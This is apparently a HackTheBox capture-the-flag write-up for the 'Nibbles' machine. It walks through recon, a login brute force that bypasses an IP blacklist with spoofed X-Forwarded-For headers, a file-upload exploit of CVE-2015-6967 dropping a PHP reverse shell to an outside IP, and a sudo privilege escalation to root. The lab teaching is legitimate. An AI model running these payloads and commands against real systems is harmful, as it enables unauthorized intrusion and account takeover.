HackTheBox Writeup Nibbles
Nibbles is a fairly simple machine, however with the inclusion of a login blacklist, it is a fair bit more challenging to find valid credentials. Luckily, a username can be enumerated and guessing the correct password does not take long for most.
Recon
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# Nmap 7.94 scan initiated Fri Sep 29 20:21:40 2023 as: nmap -sVC -T4 -Pn -vv -oA ./nmap/full_tcp_scan -p 22,80 nibbles.htb
Nmap scan report for nibbles.htb (10.129.68.41)
Host is up, received user-set (0.063s latency).
Scanned at 2023-09-29 20:21:40 CST for 11s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
| 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 29 20:21:51 2023 -- 1 IP address (1 host up) scanned in 11.36 seconds
80 - HTTP : Apache/2.4.18
Info
1
http://nibbles.htb [200] [] [Apache/2.4.18 (Ubuntu)] [Apache HTTP Server:2.4.18,Ubuntu] [d5372d31ce747f7a6bd8fea14f49e1336afcc3d0]
Directory
1
feroxbuster -k -t 150 -u 'http://nibbles.htb' -o ferox_80.txt
1
2
3
┌──(bravosec㉿fsociety)-[~/htb/Nibbles]
└─$ cat ferox_80.txt|awk '$1!=404'
200 GET 16l 9w 93c http://nibbles.htb/
User Flag
Shell as nibbler
Discover a hidden directory
No hosts found from website, and no directories found. Should try CVE or take a look at source code
Fun fact : if attacker did not find the hidden directory from the source code, the wordlist OneListForAll will be able to brute force it
When it comes to really large wordlist, use gobuster instead of feroxbuster for stability and reliability
1 gobuster dir -k -t 150 -e -u 'http://nibbles.htb' -w /opt/wordlists/OneListForAll/onelistforall.txt -o ferox_80_onelistforall.txt
Analyze Nibbleblog 4.0.3 - Arbitrary File Upload (CVE-2015-6967) exploit
http://nibbles.htb/nibbleblog/
Looks like a CMS
Found their github, last commit was from 2019
, very likely to be vulnerable
https://github.com/dignajar/nibbleblog
1
searchsploit nibbleblog
Let’s try exploit it manually without metasploit
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(bravosec㉿fsociety)-[~/htb/Nibbles]
└─$ searchsploit -m 38489
Exploit: Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)
URL: https://www.exploit-db.com/exploits/38489
Path: /usr/share/exploitdb/exploits/php/remote/38489.rb
Codes: CVE-2015-6967, OSVDB-127059
Verified: True
File Type: Ruby script, ASCII text
Copied to: /home/kali/htb/Nibbles/38489.rb
┌──(bravosec㉿fsociety)-[~/htb/Nibbles]
└─$ vi 38489.rb
- It needs username and password, and the login endpoint is default to
/admin.php
- It will generate a
.php
payload with a random name and build a form to submit the file as a plugin
- Below is its post data of upload request
- The uploaded php file will be at
/content/private/plugins/my_image/image.php
Exploit CVE-2015-6967 (manually)
Got blocked while trying to brute force login
http://nibbles.htb/nibbleblog/admin.php
Tried some passwords like admin
:admin
, admin
:password
, all failed
Tried google : Nibbleblog default password
, nothing we want
Start brute force common credentials
Capture the login request with burp and save to login.req
Then change the password value to FUZZ
- username=admin&password=FUZZ
1
2
┌──(bravosec㉿fsociety)-[~/htb/Nibbles]
└─$ ffuf -c -request login.req -request-proto http -w /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt -r -fs 48
I got blacklisted after a while
Find how the blacklist protection work
Start enumerating directories
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
┌──(bravosec㉿fsociety)-[~/htb/Nibbles]
└─$ feroxbuster -t 150 -u http://nibbles.htb/nibbleblog -r -n -o ferox_nibbleblog.txt -C 404
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://nibbles.htb/nibbleblog
🚀 Threads │ 150
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
💢 Status Code Filters │ [404]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💾 Output File │ ferox_nibbleblog.txt
🏁 HTTP methods │ [GET]
📍 Follow Redirects │ true
🚫 Do Not Recurse │ true
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 11l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 305l 1646w 25081c http://nibbles.htb/nibbleblog/languages/ru_RU.bit
200 GET 326l 1740w 17135c http://nibbles.htb/nibbleblog/languages/en_US.bit
200 GET 63l 643w 4628c http://nibbles.htb/nibbleblog/README
200 GET 18l 82w 1353c http://nibbles.htb/nibbleblog/content/
200 GET 1l 6w 48c http://nibbles.htb/nibbleblog/
200 GET 20l 104w 1741c http://nibbles.htb/nibbleblog/themes/
200 GET 288l 905w 16495c http://nibbles.htb/nibbleblog/languages/zh_CN.bit
200 GET 288l 1575w 17763c http://nibbles.htb/nibbleblog/languages/de_DE.bit
200 GET 288l 2061w 18787c http://nibbles.htb/nibbleblog/languages/vi_VI.bit
200 GET 288l 1645w 18190c http://nibbles.htb/nibbleblog/languages/pl_PL.bit
200 GET 288l 1748w 17998c http://nibbles.htb/nibbleblog/languages/pt_PT.bit
200 GET 30l 214w 3777c http://nibbles.htb/nibbleblog/plugins/
200 GET 288l 921w 16627c http://nibbles.htb/nibbleblog/languages/zh_TW.bit
200 GET 288l 1942w 19170c http://nibbles.htb/nibbleblog/languages/fr_FR.bit
200 GET 288l 1797w 18351c http://nibbles.htb/nibbleblog/languages/it_IT.bit
200 GET 288l 1810w 18341c http://nibbles.htb/nibbleblog/languages/es_ES.bit
200 GET 287l 1754w 17569c http://nibbles.htb/nibbleblog/languages/nl_NL.bit
200 GET 27l 181w 3167c http://nibbles.htb/nibbleblog/languages/
200 GET 22l 126w 2127c http://nibbles.htb/nibbleblog/admin/
http://nibbles.htb/nibbleblog/README
Confirmed its version is vulnerable
Found config.xml
under the directory listings, but did not find anything really helpful
http://nibbles.htb/nibbleblog/content/private/config.xml
Found users.xml
with fail_count
that stores blacklist info
http://nibbles.htb/nibbleblog/content/private/users.xml
Fuzz header to bypass IP blacklist
Now I will fuzz some IP headers to check if I can bypass the blacklist
1
2
3
4
5
┌──(bravosec㉿fsociety)-[~/htb/Nibbles]
└─$ cp login.req login_bypass.req
┌──(bravosec㉿fsociety)-[~/htb/Nibbles]
└─$ vi login_bypass.req
login_bypass.req
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST /nibbleblog/admin.php HTTP/1.1
Host: nibbles.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: http://nibbles.htb
Connection: close
Referer: http://nibbles.htb/nibbleblog/admin.php
Cookie: PHPSESSID=7hhg29abtivtrttjqnu82ic4f3
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
FUZZ: 127.0.0.1
username=admin&password=x
Monitor changes on the page via hwatch
1
hwatch -c -d -n 1 'curl -s http://nibbles.htb/nibbleblog/content/private/users.xml|xmllint --format -'
Start fuzzing (The payloads were from dontgo403)
1
ffuf -c -request login.req -request-proto http -w /opt/sectools/web/Bypasses/dontgo403/payloads/headers -r -fs 48
X-Forwarded-For
andClient-IP
worked!
Generate custom password list via cewl and hashcat
Gather keywords from the blog page
1
cewl -d 5 -m 3 --with-numbers -w cewl_nibbleblog.txt http://nibbles.htb/nibbleblog/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(bravosec㉿fsociety)-[~/htb/Nibbles]
└─$ cat cewl_nibbleblog.txt
Nibbles
Yum
yum
Hello
world
posts
Home
Uncategorised
Music
Videos
HEADER
MAIN
PLUGINS
Categories
Latest
image
Pages
VIEW
There
are
FOOTER
Atom
Top
Powered
Nibbleblog
ATOM
Feed
http
134
nibbleblog
feed
php
2023
30T09
Generate a wordlist with hashcat rules
1
2
┌──(bravosec㉿fsociety)-[~/htb/Nibbles]
└─$ hashcat --force --stdout cewl_nibbleblog.txt -r /usr/share/hashcat/rules/best64.rule > passwords_best64.txt
Then use duplicut to cleanup the wordlist
1
2
3
4
┌──(bravosec㉿fsociety)-[~/htb/Nibbles]
└─$ /opt/sectools/password-attacks/duplicut/duplicut -p passwords_best64.txt -o passwords_best64_duplicut.txt
duplicut successfully removed 366 duplicates and 33 filtered lines in 00 seconds
-p
: Filter out non-ascii characters
Generate random IP addresses to a wordlist
1
2
3
┌──(bravosec㉿fsociety)-[~/htb/Nibbles]
└─$ wc -l passwords_best64_duplicut.txt
2206 passwords_best64_duplicut.txt
We need 2206
random IPs to brute simultaneous with the passwords we generated
Though I can generate the IP addresses in real time and pipe to ffuf, but that will be very slow
Let’s save them to a wordlist, I’ll use faker python package to generate ip
Faker is a Python package that generates fake data for you.
gen_ipv6.py
1
2
3
4
5
6
7
8
9
10
11
12
13
import sys
from faker import Faker
fake = Faker()
if len(sys.argv) != 2:
print("Usage : python sys.argv[0] <lines_of_ipv6>")
sys.exit(1)
count = int(sys.argv[1])
with open("rnd_ipv6.txt", "w") as f:
f.writelines((f"{fake.ipv6()}\n" for _ in range(count)))
print(f"Wrote {count} ips to rnd_ipv6.txt")
1
2
3
┌──(bravosec㉿fsociety)-[~/htb/Nibbles]
└─$ python gen_ipv6.py 2206
Appended 2206 ips to rnd_ipv6.txt
Brute force via ffuf
login_blacklist_bypass.req
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST /nibbleblog/admin.php HTTP/1.1
Host: nibbles.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: http://nibbles.htb
X-Forwarded-For : FUZZ1
Connection: close
Referer: http://nibbles.htb/nibbleblog/admin.php
Cookie: PHPSESSID=7hhg29abtivtrttjqnu82ic4f3
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
username=admin&password=FUZZ2
- Use
pitchfork
mode instead of the defaultclusterbomb
mode
1
2
┌──(bravosec㉿fsociety)-[~/htb/Nibbles]
└─$ ffuf -c -request login_blacklist_bypass.req -request-proto http -w ./rnd_ipv6.txt:FUZZ1 -w ./passwords_best64_duplicut.txt:FUZZ2 -r -fs 1541 -mode pitchfork
Got password :
nibbles
Exploit
After login I can see all those flailed login attempts, brute forcing should always be the last resort in real engagements
Check plugins
My image
is the only plugin that allows user to upload files with no extension limits
Upload a php revshell
rev.php
1
<?php system("/bin/bash -c 'bash -i > /dev/tcp/10.10.16.13/1111 0>&1'"); ?>
Although it gave some errors, but the revshell still works
1
2
┌──(bravosec㉿fsociety)-[~/htb/Nibbles]
└─$ curl nibbles.htb/nibbleblog/content/private/plugins/my_image/image.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(bravosec㉿fsociety)-[~/htb/Nibbles]
└─$ nc -lvnp 1111
listening on [any] 1111 ...
connect to [10.10.16.13] from (UNKNOWN) [10.129.63.157] 59882
python3 -c 'import pty; pty.spawn("/bin/bash")'
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ ^Z
zsh: suspended nc -lvnp 1111
┌──(bravosec㉿fsociety)-[~/htb/Nibbles]
└─$ stty raw -echo;fg
[1] + continued nc -lvnp 1111
<ml/nibbleblog/content/private/plugins/my_image$ export TERM=xterm
<ml/nibbleblog/content/private/plugins/my_image$ stty rows 200 columns 200
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cat ~/user.txt
3df3ff4b6e491912073bb4ff2db25dae
Root Flag
From nibbler to root
SUDO
1
2
3
4
5
6
7
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
1
2
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ ls -l /home/nibbler/personal/stuff/monitor.sh
ls: cannot access '/home/nibbler/personal/stuff/monitor.sh': No such file or directory
1
2
3
4
5
6
7
8
9
10
11
12
13
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ echo -e '#!/bin/bash\nbash -p'>/home/nibbler/personal/stuff/monitor.sh
bash: /home/nibbler/personal/stuff/monitor.sh: No such file or directory
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ mkdir -p /home/nibbler/personal/stuff/
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ echo -e '#!/bin/bash\nbash -p'>/home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ sudo /home/nibbler/personal/stuff/monitor.sh
root@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image# id
uid=0(root) gid=0(root) groups=0(root)
root@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image# cat /root/root.txt
d828b8afecc05002d5a8489e304ac44e
Additional
OpenSSH 2.3 < 7.7 - Username Enumeration (CVE-2018-15473)
Found this via Nuclei (Nmap vuln script scan won’t find it)
https://github.com/epi052/cve-2018-15473
Or use scanner/ssh/ssh_enumusers
from metasploit
1
2
┌──(bravosec㉿fsociety)-[~/htb/Nibbles/cve-2018-15473]
└─$ python ssh-username-enum.py -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt nibbles.htb